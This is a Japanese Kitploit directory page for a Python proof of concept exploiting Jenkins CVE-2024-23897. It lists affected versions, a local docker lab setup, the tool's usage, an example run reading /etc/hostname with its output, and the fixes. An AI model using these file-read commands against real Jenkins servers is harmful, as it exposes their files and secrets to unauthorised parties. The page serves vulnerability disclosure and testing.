Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Jenkins-CVE-2024-23897 — Jenkins CVE-2024-23897用のPython PoC。CLIを介した任意ファイル読み取りで、未認証のファイル開示を複数の悪用方法で公開します。 | Kitploit
ツール/GitHubGitHub/abraxa5/jenkins-cve-2024-23897
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストレッドチーミング
GitHubabraxa5/jenkins-cve-2024-23897

Jenkins-CVE-2024-23897

Jenkins CVE-2024-23897用のPython PoC。CLIを介した任意ファイル読み取りで、未認証のファイル開示を複数の悪用方法で公開します。

リポジトリを見る
1112年前未レビュー
ウェブサイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Jenkins CVE-2024-23897 PoC

CVE-2024-23897の概念実証(PoC)です。これは、Jenkinsの組み込みコマンドラインインターフェース(CLI)における任意のファイル読み取りの脆弱性です。Overall/Read権限を持つ認証されていない攻撃者が、Jenkinsコントローラのファイルシステム上の任意のファイルを読み取ることを可能にします。

影響を受けるバージョン

  • Jenkins バージョン <= 2.441
  • Jenkins LTS バージョン <= 2.426.2

脆弱なインスタンスのセットアップ

docker compose を使用してローカルの脆弱なインスタンスを起動します:

root@kitploit:~
cd docker
docker compose up -d

インスタンスは http://localhost:1234 で利用可能になります

エクスプロイト

root@kitploit:~
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)

例

root@kitploit:~
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed

このスクリプトは、並行処理と接続タイムアウトにより、大きなファイルの読み取りに問題が発生する可能性があります。より技術的な詳細と脆弱性のウォークスルーについては、私のブログ記事をご覧ください。

修正

  • Jenkins 2.442 または LTS 2.426.3 にアップグレード
  • Jenkins セキュリティアドバイザリ に記載されている一時的な回避策を適用する。

関連リンク

  • Sonar Source | 過度な展開: Jenkinsにおける重大なセキュリティ脆弱性を発見
  • Jenkins セキュリティアドバイザリ - 2024-01-24
  • Qualys ThreatPROTECT | Jenkins Core リモートコード実行脆弱性 (CVE-2024-23897)
  • CVE-2024-23897: Jenkins 任意ファイル漏洩脆弱性の影響評価 – Horizon3.ai
ツールをダウンロード